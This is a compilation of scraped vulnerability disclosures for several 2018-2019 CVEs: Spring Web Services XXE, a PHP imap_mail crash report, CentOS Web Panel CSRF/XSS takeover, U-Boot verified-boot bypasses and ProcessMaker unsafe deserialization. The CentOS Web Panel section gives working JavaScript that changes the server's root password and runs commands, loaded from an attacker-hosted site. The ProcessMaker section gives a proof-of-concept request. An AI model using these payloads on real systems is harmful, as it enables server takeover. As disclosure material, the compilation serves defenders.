Spring Web Services, versions 2.4.3, 3.0.4, and older unsupported versions of all three projects, were susceptible to XML External Entity Injection (XXE) when receiving XML data from untrusted sources.

All Vulnerability Reports

**CVE-2019-3773: XML External Entity Injection (XXE)**  
**Severity**

Critical

**Description**

Spring Web Services, versions 2.4.3, 3.0.4, and older unsupported versions of all three projects, were susceptible to XML External Entity Injection (XXE) when receiving XML data from untrusted sources.

**Affected VMware Products and Versions**

Severity is critical unless otherwise noted.

*   Spring Web Services versions 2.4.3, 3.0.4 and older

**Mitigation**

Users of affected versions should apply the following mitigation:

*   Upgrade spring-ws, spring-xml jars to 2.4.4, 3.0.6 or later
*   Spring Web Services components that exhibited this vulnerability now disable the features as advised in the reference cheat sheet \[1\] by default, but allow user configuration of the components if the feature can be enabled because XML is received from a trusted source.

**References**

*   https://www.owasp.org/index.php/XML\_External\_Entity\_(XXE)\_Prevention\_Cheat\_Sheet

**History**

2019-01-14: Initial vulnerability report published.

CVE-2019-3773: CVE-2019-3773 | Security

An out of bounds read was discovered in systemd-journald in the way it parses log messages that terminate with a colon ':'. A local attacker can use this flaw to disclose process memory data. Versions from v221 to v239 are vulnerable.

CVE-2018-16866

ext/imap/php_imap.c in PHP 5.x and 7.x before 7.3.0 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an empty string in the message argument to the imap_mail function.

Sec Bug #77020

null pointer dereference in imap\_mail

Submitted:

2018-10-16 08:36 UTC

Modified:

2018-12-10 03:07 UTC

From:

zhangweiye at topsec dot com dot cn

Assigned:

stas (profile)

Status:

Closed

Package:

IMAP related

PHP Version:

7.2.11

OS:

ubuntu

Private report:

No

CVE-ID:

2018-19935

 **\[2018-10-16 08:36 UTC\] zhangweiye at topsec dot com dot cn**

Description:
------------
in imap\_mail if message args is null, in \_php\_imap\_mail no check wheater message  can get, so crash.

\`\`\`
     fprintf(sendmail, "\\n%s\\n", message);

\`\`\`



/usr/local/php/bin/php ./craxxx.php 

Warning: imap\_mail(): No message string in mail command in /home/fan/github/php-7.2.10/myselffuzz/craxxx.php on line 3
sh: 1: -t: not found
Segmentation fault (core dumped)







../sapi/cli/php ./craxxx.php 

Warning: imap\_mail(): No message string in mail command in /home/fan/github/php-7.2.10/myselffuzz/craxxx.php on line 3
ASAN:SIGSEGV
=================================================================
==23766==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x7fae925d9cc0 bp 0x7ffcb6b27a10 sp 0x7ffcb6b274a0 T0)
sh: 1: -t: not found
    #0 0x7fae925d9cbf in vfprintf (/lib/x86\_64-linux-gnu/libc.so.6+0x4ecbf)
    #1 0x7fae926a1bc8 in \_\_fprintf\_chk (/lib/x86\_64-linux-gnu/libc.so.6+0x116bc8)
    #2 0xa5aeb0 in fprintf /usr/include/x86\_64-linux-gnu/bits/stdio2.h:97
    #3 0xa5aeb0 in \_php\_imap\_mail /home/fan/github/php-7.2.10/ext/imap/php\_imap.c:4065
    #4 0xa5b22d in zif\_imap\_mail /home/fan/github/php-7.2.10/ext/imap/php\_imap.c:4112
    #5 0x17da703 in ZEND\_DO\_ICALL\_SPEC\_RETVAL\_UNUSED\_HANDLER /home/fan/Desktop/php-7.2.10/Zend/zend\_vm\_execute.h:573
    #6 0x17da703 in execute\_ex /home/fan/Desktop/php-7.2.10/Zend/zend\_vm\_execute.h:59747
    #7 0x181b5c3 in zend\_execute /home/fan/Desktop/php-7.2.10/Zend/zend\_vm\_execute.h:63776
    #8 0x1356ef2 in zend\_execute\_scripts /home/fan/Desktop/php-7.2.10/Zend/zend.c:1496
    #9 0x11c0776 in php\_execute\_script /home/fan/Desktop/php-7.2.10/main/main.c:2590
    #10 0x1823488 in do\_cli /home/fan/Desktop/php-7.2.10/sapi/cli/php\_cli.c:1011
    #11 0x18256f4 in main /home/fan/Desktop/php-7.2.10/sapi/cli/php\_cli.c:1404
    #12 0x7fae925ab82f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2082f)
    #13 0x440888 in \_start (/home/fan/github/php-7.2.10/sapi/cli/php+0x440888)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV ??:0 vfprintf
==23766==ABORTING




Test script:
---------------
<?php
	imap\_mail('1', 1, NULL);

?>

**Patches**CVE-2018-19935 (last revision 2021-04-07 01:04 UTC by 2432857142 at qq dot com)

Add a Patch

**Pull Requests**

Add a Pull Request

**History**

AllCommentsChangesGit/SVN commitsRelated reports

 **\[2018-10-16 14:52 UTC\] cmb@php.net**

\-Summary: a null pointer defference in imap\_mail +Summary: null pointer dereference in imap\_mail \-Status: Open +Status: Analyzed \-Package: \*Mail Related +Package: IMAP related \-Assigned To: +Assigned To: stas

 **\[2018-10-18 08:58 UTC\] 790358237 at qq dot com**

Thanks for your reply. I am very happy to do this.

 **\[2018-11-11 18:05 UTC\] stas@php.net**

Fix makes sense, we can merge it in the next release cycle.

 **\[2018-11-11 18:09 UTC\] stas@php.net**

Added to security repo as 8b1049a7ae96ae9b0315cfe6742e5fb010ffb5d3 (for 5.6, higher versions will be merged up).

 **\[2018-11-21 05:42 UTC\] 790358237 at qq dot com**

will this get a cve?

 **\[2018-12-03 08:43 UTC\] stas@php.net**

\-Status: Analyzed +Status: Closed

 **\[2018-12-07 08:13 UTC\] 790358237 at qq dot com**

this assign CVE-2018-19935.

 **\[2018-12-07 13:31 UTC\] remi@php.net**

\-CVE-ID: +CVE-ID: 2018-19935

 **\[2018-12-07 15:32 UTC\] remi@php.net**

Notice: This issue is fixed in 5.6.39, 7.0.33 and 7.3.0
The fix is missing in 7.1.25 and 7.2.13, will be part of 7.1.26 and 7.2.14

 **\[2018-12-10 02:44 UTC\] zhangweiye at topsec dot com dot cn**

\-: 790358237 at qq dot com +: zhangweiye at topsec dot com dot cn

 **\[2018-12-10 02:44 UTC\] zhangweiye at topsec dot com dot cn**

credit:zhangweiye@topsec.com.cn

 **\[2018-12-10 03:07 UTC\] zhangweiye at topsec dot com dot cn**

credit topsec(zhangweiye)

CVE-2018-19935: null pointer dereference in imap_mail

CentOS-WebPanel.com (aka CWP) CentOS Web Panel through 0.9.8.740 allows CSRF via admin/index.php?module=send_ssh, as demonstrated by executing an arbitrary OS command.

    [+] Title: CentOS Web Panel Root Account Takeover + Remote Command Execution <= v0.9.8.740[+] Author: Numan OZDEMIR (https://infinitumit.com.tr)[+] Vendor Homepage: centos-webpanel.com[+] Software Link: http://centos-webpanel.com/cwp-latest[+] Version: Up to v0.9.8.740.[+] CVE: CVE-2018-18773, CVE-2018-18772 and CVE-2018-18774.[+] Detailed: https://numanozdemir.com/respdisc/cwp.pdf[+] Discovered by Numan OZDEMIR in InfinitumIT Labs[~] Description:Attacker can change target server's root password and execute command, by CSRF vulnerability.Also, there is a XSS vulnerability, hacker can exploit the CSRF vulnerability by this XSSvulnerability and run bad-purposed JavaScript codes on administrator's browser.So, CSRF/XSS to full server takeover.[~] How to Reproduce:Hacker can exploit this vulnerability (changing root password) by XSS or CSRF.Hacker will create a website and put those codes into source:<script>var url = "http://targetserver:2030/admin/index.php?module=rootpwd";var params = "ifpost=yes&password1=newpassword&password2=newpassword";var vuln = new XMLHttpRequest();vuln.open("POST", url, true);vuln.withCredentials = 'true';vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded");vuln.send(params);</script>(Update newpassword as the password that you want to change.)If hacker wants to exploit this by CSRF, CWP administrator will click hacker's website.But if hacker wants to exploit this by XSS, CWP administrator will click here: (admin's own website)http://targetserver:2030/admin/index.php?module=<script%20src=//hackerswebsite.com/password.js></script>After exploiting, you can connect to server by Putty or access the CWP panel with the passwordthat you have specified from 2030 port.The second vulnerability is remote command execution.Hacker can exploit this vulnerability (remote command execution) by XSS or CSRF too.Again, hacker will create a website and put those codes into source:<script>var url = "http://targetserver:2030/admin/index.php?module=send_ssh";var params = "ssh+command=whoami";var vuln = new XMLHttpRequest();vuln.open("POST", url, true);vuln.withCredentials = 'true';vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded");vuln.send(params);</script>(Update whoami as command that you want to run.)Same logic like top, if hacker wants to exploit this by CSRF, CWP administrator will click hacker's website.But if hacker wants to exploit this by XSS, CWP administrator will click here: (admin's own website)http://targetserver:2030/admin/index.php?module=<script%20src=//hackerswebsite.com/command.js></script>// shouldnt think that CSRF/XSS are unimportant vulnerabilities.// for secure days...

CVE-2018-18772: CentOS Web Panel 0.9.8.740 Root Account Takeover

DENX U-Boot through 2018.09-rc1 has a remotely exploitable buffer overflow via a malicious TFTP server because TFTP traffic is mishandled. Also, local exploitation can occur via a crafted kernel image.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Fri, 2 Nov 2018 05:30:02 +0100
From: Andrea Barisani <andrea.barisani@...ecure.com>
To: <oss-security@...ts.openwall.com>
Subject: CVE-2018-18439, CVE-2018-18440 - U-Boot verified boot bypass
 vulnerabilities

Security advisory: U-Boot verified boot bypass
==============================================

The Universal Boot Loader - U-Boot \[1\] verified boot feature allows
cryptographic authentication of signed kernel images, before their execution.

This feature is essential in maintaining a full chain of trust on systems which
are secure booted by means of an hardware anchor.

Multiple techniques have been identified that allow to execute arbitrary code,
within a running U-Boot instance, by means of externally provided
unauthenticated data.

All such techniques spawn from the lack of memory allocation protection within
the U-Boot architecture, which results in several means of providing
excessively large images during the boot process.

Some implementers might find the following issues as an intrinsic
characteristic of the U-Boot memory model, and consequently a mere aspect of
correct U-Boot configuration and command restrictions.

However in our opinion the inability of U-Boot to protect itself when loading
binaries is an unexpected result of non trivial understanding, particularly
important to emphasize in trusted boot scenarios.

This advisory details two specific techniques that allow to exploit U-Boot lack
of memory allocation restrictions, with the most severe case also detailing a
workaround to mitigate the issue.

It must be emphasized that cases detailed in the next sections only represent
two possible occurrences of such architectural limitation, other U-Boot image
loading functions are extremely likely to suffer from the same validation
issues.

To a certain extent the identified issues are similar to one of the findings
reported as CVE-2018-1000205 \[2\], however they concern different functions
which in some cases are at a lower level, therefore earlier in the boot image
loading stage.

Again all such issues are a symptom of the same core architectural limitation,
being the lack of memory allocation constraints for received images.

It is highly recommended, for implementers of trusted boot schemes, to review
use of all U-Boot booting/loading commands, and not merely the two specific
ones involved in the findings below, to apply limitations (where
applicable/possible) to the size of loaded images in relation to the available
RAM.

It should also be emphasized that any trusted boot scheme must also rely on an
appropriate lockdown of all possibilities for interactive consoles, by boot
process interruption or failure, to ever be prompted.


U-Boot insufficient boundary checks in filesystem image load
------------------------------------------------------------

The U-Boot bootloader supports kernel loading from a variety of filesystem
formats, through the \`load\` command or its filesystem specific equivalents
(e.g. \`ext2load\`, \`ext4load\`, \`fatload\`, etc.)

These commands do not protect system memory from being overwritten when loading
files of a length that exceeds the boundaries of the relocated U-Boot memory
region, filled with the loaded file starting from the passed \`addr\` variable.

Therefore an excessively large boot image, saved on the filesystem, can be
crafted to overwrite all U-Boot static and runtime memory segments, and in
general all device addressable memory starting from the \`addr\` load address
argument.

The memory overwrite can directly lead to arbitrary code execution, fully
controlled by the contents of the loaded image.

When verified boot is implemented, the issue allows to bypass its intended
validation as the memory overwrite happens before any validation can take
place.

The following example illustrates the issue, triggered with a 129MB file on a
machine with 128MB or RAM:

\`\`\`
U-Boot 2018.09-rc1 (Oct 10 2018 - 10:52:54 +0200)

DRAM:  128 MiB
Flash: 128 MiB
MMC:   MMC: 0

# print memory information
=> bdinfo
arch\_number = 0x000008E0
boot\_params = 0x60002000
DRAM bank   = 0x00000000
-> start    = 0x60000000
-> size     = 0x08000000
DRAM bank   = 0x00000001
-> start    = 0x80000000
-> size     = 0x00000004
eth0name    = smc911x-0
ethaddr     = 52:54:00:12:34:56
current eth = smc911x-0
ip\_addr     = <NULL>
baudrate    = 38400 bps
TLB addr    = 0x67FF0000
relocaddr   = 0x67F96000
reloc off   = 0x07796000
irq\_sp      = 0x67EF5EE0
sp start    = 0x67EF5ED0

# load large file
=> ext2load mmc 0 0x60000000 fitimage.itb

# In this specific example U-Boot falls in an infinite loop, results vary
# depending on the test case and filesystem/device driver used. A debugging
# session demonstrates memory being overwritten:
(gdb) p gd
$28 = (volatile gd\_t \*) 0x67ef5ef8
(gdb) p \*gd
$27 = {bd = 0x7f7f7f7f, flags = 2139062143, baudrate = 2139062143, ... }
(gdb) x/300x 0x67ef5ef8
0x67ef5ef8:	0x7f7f7f7f	0x7f7f7f7f	0x7f7f7f7f	0x7f7f7f7f
\`\`\`

It can be seen that memory address belonging to U-Boot data segments, in this
specific case the global data structure \`gd\`, is overwritten with payload
originating from \`fitimage.itb\` (filled with \`0x7f7f7f7f\`).

### Impact

Arbitrary code execution can be achieved within a U-Boot instance by means of
unauthenticated binary images, loaded through the \`load\` command or its
filesystem specific equivalents.

It should be emphasized that all load commands are likely to be affected by the
same underlying root cause of this vulnerability.

### Workaround

The optional \`bytes\` argument can be passed to all load commands to restrict
the maximum size of the retrieved data.

The issue can be therefore mitigated by passing a \`bytes\` argument with a value
consistent with the U-Boot memory regions mapping and size.


U-Boot insufficient boundary checks in network image boot
---------------------------------------------------------

The U-Boot bootloader supports kernel loading from a variety of network
sources, such as TFTP via the \`tftpboot\` command.

This command does not protect system memory from being overwritten when loading
files of a length that exceeds the boundaries of the relocated U-Boot memory
region, filled with the loaded file starting from the passed \`loadAddr\`
variable.

Therefore an excessively large boot image, served over TFTP, can be crafted to
overwrite all U-Boot static and runtime memory segments, and in general all
device addressable memory starting from the \`loadAddr\` load address argument.

The memory overwrite can directly lead to arbitrary code execution, fully
controlled by the contents of the loaded image.

When verified boot is implemented, the issue allows to bypass its intended
validation as the memory overwrite happens before any validation can take
place.

The issue can be exploited by several means:

  - An excessively large crafted boot image file is parsed by the
    \`tftp\_handler\` function which lacks any size checks, allowing the memory
    overwrite.

  - A malicious server can manipulate TFTP packet sequence numbers to store
    downloaded file chunks at arbitrary memory locations, given that the
    sequence number is directly used by the \`tftp\_handler\` function to calculate
    the destination address for downloaded file chunks.

    Additionally the \`store\_block\` function, used to store downloaded file
    chunks in memory, when invoked by \`tftp\_handler\` with a \`tftp\_cur\_block\`
    value of 0, triggers an unchecked integer underflow.

    This allows to potentially erase memory located before the \`loadAddr\` when
    a packet is sent with a null, following at least one valid packet.

The following example illustrates the issue, triggered with a 129MB file on a
machine with 128MB or RAM:

\`\`\`
U-Boot 2018.09-rc1 (Oct 10 2018 - 10:52:54 +0200)

DRAM:  128 MiB
Flash: 128 MiB
MMC:   MMC: 0

# print memory information
=> bdinfo
arch\_number = 0x000008E0
boot\_params = 0x60002000
DRAM bank   = 0x00000000
-> start    = 0x60000000
-> size     = 0x08000000
DRAM bank   = 0x00000001
-> start    = 0x80000000
-> size     = 0x00000004
eth0name    = smc911x-0
ethaddr     = 52:54:00:12:34:56
current eth = smc911x-0
ip\_addr     = <NULL>
baudrate    = 38400 bps
TLB addr    = 0x67FF0000
relocaddr   = 0x67F96000
reloc off   = 0x07796000
irq\_sp      = 0x67EF5EE0
sp start    = 0x67EF5ED0

# configure environment
=> setenv loadaddr 0x60000000
=> dhcp
smc911x: MAC 52:54:00:12:34:56
smc911x: detected LAN9118 controller
smc911x: phy initialized
smc911x: MAC 52:54:00:12:34:56
BOOTP broadcast 1
DHCP client bound to address 10.0.0.20 (1022 ms)
Using smc911x-0 device
TFTP from server 10.0.0.1; our IP address is 10.0.0.20
Filename 'fitimage.bin'.
Load address: 0x60000000
Loading: #################################################################
...
         ####################################

R00=7f7f7f7f R01=67fedf6e R02=00000000 R03=7f7f7f7f
R04=7f7f7f7f R05=7f7f7f7f R06=7f7f7f7f R07=7f7f7f7f
R08=7f7f7f7f R09=7f7f7f7f R10=0000d677 R11=67fef670
R12=00000000 R13=67ef5cd0 R14=02427f7f R15=7f7f7f7e
PSR=400001f3 -Z-- T S svc32
\`\`\`

It can be seen that the program counter (PC, r15) is set to an address
originating from \`fitimage.itb\` (filled with \`0x7f7f7f7f\`), as the result of
the U-Boot memory overwrite.

### Impact

Arbitrary code execution can be achieved within a U-Boot instance by means of
unauthenticated binary images, passed through TFTP and loaded through the
\`tftpboot\` command, or by a malicious TFTP server capable of sending arbitrary
response packets.

It should be emphasized that all network boot commands are likely to be
affected by the same underlying root cause of this vulnerability.

### Workaround

The \`tftpboot\` command lacks any optional argument to restrict the maximum size
of downloaded images, therefore the only workaround at this time is to avoid
using this command on environments that require trusted boot.


Affected version
----------------

All released U-Boot versions, at the time of this advisory release, are
believed to be vulnerable.

All tests have been performed against U-Boot version 2018.09-rc1.


Credit
------

Vulnerabilities discovered and reported by the Inverse Path team at F-Secure,
in collaboration with Quarkslab.


CVE
---

CVE-2018-18440: U-Boot insufficient boundary checks in filesystem image load
CVE-2018-18439: U-Boot insufficient boundary checks in network image boot


Timeline
--------

2018-10-05: network boot finding identified during internal security audit
            by Inverse Path team at F-Secure in collaboration with Quarkslab.

2018-10-10: filesystem load finding identified during internal security audit
            by Inverse Path team at F-Secure.

2018-10-12: vulnerability reported by Inverse Path team at F-Secure to U-Boot
            core maintainer and Google security, embargo set to 2018-11-02.

2018-10-16: Google closes ticket reporting that ChromeOS is not affected due
            to their specific environment customizations.

2018-10-17: CVE IDs requested to MITRE and assigned.

2018-11-02: advisory release.


References
----------

\[1\] https://www.denx.de/wiki/U-Boot
\[2\] https://lists.denx.de/pipermail/u-boot/2018-June/330487.html

Permalink
---------

https://github.com/inversepath/usbarmory/blob/master/software/secure\_boot/Security\_Advisory-Ref\_IPVR2018-0001.txt

-- 
Andrea Barisani     Head of Hardware Security |     F-Secure
                                      Founder | Inverse Path

https://www.f-secure.com             https://inversepath.com
0x864C9B9E 0A76 074A 02CD E989 CE7F AC3F DA47 578E 864C 9B9E
       "Pluralitas non est ponenda sine necessitate"

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2018-18439: oss-security - CVE-2018-18439, CVE-2018-18440 - U-Boot verified boot bypass vulnerabilities

In mspack/cab.h in libmspack before 0.8alpha and cabextract before 1.8, the CAB block input buffer is one byte too small for the maximal Quantum block, leading to an out-of-bounds write.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

CVE-2018-18584: security - Buffer overflow in cabextract/libmspack (Fwd: New cabextract 1.8 and libmspack 0.8 release)

CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.480 has Command Injection via shell metacharacters in the admin/index.php service_start, service_restart, service_fullstatus, or service_stop parameter.

\# Exploit Title: Centos Web Panel 0.9.8.480 Multiple Vulnerabilities  
\# Exploit Author: Seccops – Siber Güvenlik Hizmetleri (https://seccops.com)  
\# Vendor Homepage: http://centos-webpanel.com/  
\# Software Link: http://centos-webpanel.com/system-requirements  
\# Version: 0.9.8.480  
\# Tested on: Centos 7  
\# Vulnerability Types: Command Injection, Local File Inclusion, Cross-site Scripting, Frame Injection  
\# CVE: CVE-2018-18322, CVE-2018-18323, CVE-2018-18324

**Referans:** 0day.today, NIST/NVD

**Author: Seccops**

**Post navigation**

**İlgili Yazılar**

CVE-2018-18322: CentOS Web Panel 0.9.8.480 Multiple Vulnerabilities - Seccops

An issue was discovered on D-Link Central WiFi Manager before v 1.03r0100-Beta1. They expose an FTP server that serves by default on port 9000 and has hardcoded credentials (admin, admin). Taking advantage of this, a remote unauthenticated attacker could execute arbitrary PHP code by uploading any file in the web root directory and then accessing it via a request.

**The page that you are looking for is not available**

CVE-2018-17440: D-Link Technical Support

An issue was discovered in the Linux kernel through 4.18.8. The vmacache_flush_all function in mm/vmacache.c mishandles sequence number overflows. An attacker can trigger a use-after-free (and possibly gain privileges) via certain thread creation, map, unmap, invalidation, and dereference operations.

CVE-2018-17182: security - Linux kernel: potential local priviledge escalation bug in vmacache code

A code execution vulnerability exists in ProcessMaker Enterprise Core 3.0.1.7-community. A specially crafted web request can cause unsafe deserialization potentially resulting in PHP code being executed. An attacker can send a crafted web parameter to trigger this vulnerability.

**Summary**

A code execution vulnerability exists in ProcessMarker Enterprise Core 3.0.1.7-community. A specially crafted web request can cause unsafe deserialization potentially resulting in PHP code being executed. An attacker can send a crafted web parameter to trigger this vulnerability.

**Tested Versions**

ProcessMaker Enterprise Core 3.0.1.7-community

**Product URLs**

https://www.processmaker.com/community-2

**CVSSv3 Score**

8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-502 - Deserialization of Untrusted Data

**Details**

It was discovered that the application deserialized untrusted data without properly limiting or validating the incoming data type.

The following Proof Of Concept request demonstrate the issue:

    GET /sysworkflow/en/neoclassic/login/sysLoginVerify.php?    
    d=TzoxNToiTXlTUUxDb25uZWN0aW9uIjoyOntzOjY6IgAqAGRzbiI7TjtzOjg6IgAqAGZsYWdzIjtpOjA7fQ== 
    HTTP/1.1
    Host: 192.168.56.101
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Referer: http://192.168.56.101/sysworkflow/en/neoclassic/login/login?
    u=%2Fsysworkflow%2Fen%2Fneoclassic%2Fadmin%2FpmLogo
    Connection: close
    

The following code was found to be responsible for unsafe deserialization:

    26 if (array_key_exists("d", $_GET)) {
    27     $_POST = unserialize(base64_decode($_GET["d"]));
    28  
    29 }
    30
    31 if (! isset ($_POST)) {
    32     G::header('location: /sys/' . $lang . '/' . SYS_SKIN . '/' . 'login/login');
    33 }
    34 if (isset($_SESSION['sysLogin'])) {
    35     $_POST['form'] = $_SESSION['sysLogin'];
    36 }
    37
    38 require_once 'authentication.php';
    39
    

**Mitigation**

Restrict access to known, trusted users and hosts.

**Timeline**

2016-04-28 - Vendor Disclosure  
2017-07-19 - Public Release

Discovered by Jerzy Kramarz of Portcullis Computer Security Limited.

Tag

#php